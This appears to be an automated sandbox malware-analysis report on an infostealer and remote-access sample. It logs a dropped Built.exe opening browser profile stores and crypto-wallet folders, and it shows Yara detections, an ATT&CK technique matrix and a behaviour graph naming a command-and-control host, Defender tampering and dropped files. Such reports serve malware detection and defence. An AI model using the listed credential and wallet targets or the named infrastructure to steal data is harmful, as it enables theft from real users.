                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackupsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pingsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archivedJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\eventsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumpsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backupsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_stateJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storageJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmpJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\dbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\gleanJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                        Source: Yara matchFile source: 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Built.exe PID: 6252, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 00000001.00000003.1694117012.0000021AFD7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000003.1694117012.0000021AFD7E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2039099236.000001D5E543D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2029505952.000001D5E6183000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2038832287.000001D5E5438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2032955728.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Built.exe PID: 6496, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Built.exe PID: 6252, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI64962\rarreg.key, type: DROPPED
                        Source: Yara matchFile source: 00000039.00000002.2145328378.0000000002852000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000037.00000002.2144420087.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000033.00000002.2143786130.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000033.00000002.2143786130.0000000003202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000033.00000002.2143786130.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.1871672428.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000034.00000002.2132843674.0000000002412000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000039.00000002.2145328378.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003B.00000002.2149228048.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000037.00000002.2144420087.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000003B.00000002.2149228048.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000039.00000002.2145328378.0000000002848000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000034.00000002.2132843674.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000026.00000002.1871672428.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: comReviewsession.exe PID: 7476, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: dasHost.exe PID: 7324, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: dasHost.exe PID: 8064, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: dwm.exe PID: 8060, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: iKSiRODBDWoPAMSDKBDQBFN.exe PID: 7568, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: iKSiRODBDWoPAMSDKBDQBFN.exe PID: 7776, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Built.exe PID: 6252, type: MEMORYSTR
                        Source: Yara matchFile source: Vjy8d2EoqK.exe, type: SAMPLE
                        Source: Yara matchFile source: 4.0.S l r .exe.409294.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.S l r .exe.569e78.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e954a4.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.S l r .exe.409294.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.3.S l r .exe.569e78.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.XClient.exe.d70000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.Vjy8d2EoqK.exe.e8248c.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.S l r .exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.Vjy8d2EoqK.exe.adfe9c.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.Vjy8d2EoqK.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.0.Vjy8d2EoqK.exe.40936c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Vjy8d2EoqK.exe PID: 2596, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: S l r .exe PID: 5768, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 7216, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\S l r .exe, type: DROPPED
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information111
                        Scripting
                        Valid Accounts221
                        Windows Management Instrumentation
                        111
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        File and Directory Permissions Modification
                        1
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        3
                        Ingress Tool Transfer
                        Exfiltration Over Other Network Medium1
                        Data Encrypted for Impact
                        CredentialsDomainsDefault Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        11
                        Process Injection
                        31
                        Disable or Modify Tools
                        LSASS Memory3
                        File and Directory Discovery
                        Remote Desktop Protocol3
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts113
                        Command and Scripting Interpreter
                        421
                        Registry Run Keys / Startup Folder
                        421
                        Registry Run Keys / Startup Folder
                        11
                        Deobfuscate/Decode Files or Information
                        Security Account Manager47
                        System Information Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        PowerShell
                        Login HookLogin Hook21
                        Obfuscated Files or Information
                        NTDS361
                        Security Software Discovery
                        Distributed Component Object ModelInput Capture4
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script221
                        Software Packing
                        LSA Secrets2
                        Process Discovery
                        SSHKeylogging15
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading
                        Cached Domain Credentials151
                        Virtualization/Sandbox Evasion
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items223
                        Masquerading
                        DCSync1
                        Application Window Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Modify Registry
                        Proc Filesystem1
                        Remote System Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt151
                        Virtualization/Sandbox Evasion
                        /etc/passwd and /etc/shadow1
                        System Network Configuration Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                        Process Injection
                        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1487977 Sample: Vjy8d2EoqK.exe Startdate: 05/08/2024 Architecture: WINDOWS Score: 100 108 ip-api.com 2->108 110 discordapp.com 2->110 112 4 other IPs or domains 2->112 132 Found malware configuration 2->132 134 Malicious sample detected (through community Yara rule) 2->134 136 Antivirus detection for dropped file 2->136 138 25 other signatures 2->138 11 Vjy8d2EoqK.exe 4 2->11         started        15 Built.exe 73 2->15         started        18 Built.exe 22 2->18         started        20 5 other processes 2->20 signatures3 process4 dnsIp5 94 C:\Users\user\AppData\Local\...\svchosts.exe, PE32 11->94 dropped 96 C:\Users\user\AppData\Local\Temp\S l r .exe, PE32 11->96 dropped 98 C:\Users\user\AppData\Local\Temp\Built.exe, PE32+ 11->98 dropped 166 Found many strings related to Crypto-Wallets (likely being stolen) 11->166 22 svchosts.exe 3 6 11->22         started        26 S l r .exe 3 11->26         started        120 ip-api.com 208.95.112.1, 49734, 49743, 80 TUT-ASUS United States 15->120 122 discordapp.com 162.159.135.233, 443, 49744 CLOUDFLARENETUS United States 15->122 168 Tries to harvest and steal browser information (history, passwords, etc) 15->168 170 Modifies Windows Defender protection settings 15->170 172 Modifies the hosts file 15->172 180 2 other signatures 15->180 28 cmd.exe 15->28         started        30 cmd.exe 15->30         started        32 cmd.exe 15->32         started        34 10 other processes 15->34 100 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 18->100 dropped 102 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 18->102 dropped 104 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 18->104 dropped 106 16 other malicious files 18->106 dropped 174 Multi AV Scanner detection for dropped file 18->174 176 Adds a directory exclusion to Windows Defender 18->176 178 Removes signatures from Windows Defender 18->178 file6 signatures7 process8 file9 82 C:\Brokercrt\comReviewsession.exe, PE32 22->82 dropped 84 C:\Brokercrt\oqZ1ERFvWaUzYBP9Lou79Kq.bat, ASCII 22->84 dropped 86 C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe, data 22->86 dropped 154 Multi AV Scanner detection for dropped file 22->154 36 wscript.exe 1 22->36         started        88 C:\Users\user\AppData\Local\...\XClient.exe, PE32 26->88 dropped 90 C:\Users\user\...\SolaraBootstrapper.exe, PE32 26->90 dropped 39 XClient.exe 26->39         started        43 SolaraBootstrapper.exe 26->43         started        156 Wscript starts Powershell (via cmd or directly) 28->156 158 Uses cmd line tools excessively to alter registry or file data 28->158 160 Modifies Windows Defender protection settings 28->160 45 powershell.exe 28->45         started        47 conhost.exe 28->47         started        162 Adds a directory exclusion to Windows Defender 30->162 53 3 other processes 30->53 49 powershell.exe 32->49         started        51 conhost.exe 32->51         started        55 17 other processes 34->55 signatures10 process11 dnsIp12 140 Wscript starts Powershell (via cmd or directly) 36->140 142 Windows Scripting host queries suspicious COM object (likely to drop second stage) 36->142 57 cmd.exe 36->57         started        114 cash-spoken.gl.at.ply.gg 147.185.221.21, 27573, 49745, 49748 SALSGIVERUS United States 39->114 92 C:\Users\user\AppData\Roaming\XClient.exe, PE32 39->92 dropped 144 Antivirus detection for dropped file 39->144 146 Multi AV Scanner detection for dropped file 39->146 148 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 39->148 152 5 other signatures 39->152 59 powershell.exe 39->59         started        116 github.com 140.82.121.4, 443, 49730, 49733 GITHUBUS United States 43->116 118 raw.githubusercontent.com 185.199.108.133, 443, 49732 FASTLYUS Netherlands 43->118 62 conhost.exe 43->62         started        150 Loading BitLocker PowerShell Module 49->150 file13 signatures14 process15 signatures16 64 comReviewsession.exe 57->64         started        68 conhost.exe 57->68         started        164 Loading BitLocker PowerShell Module 59->164 70 conhost.exe 59->70         started        process17 file18 74 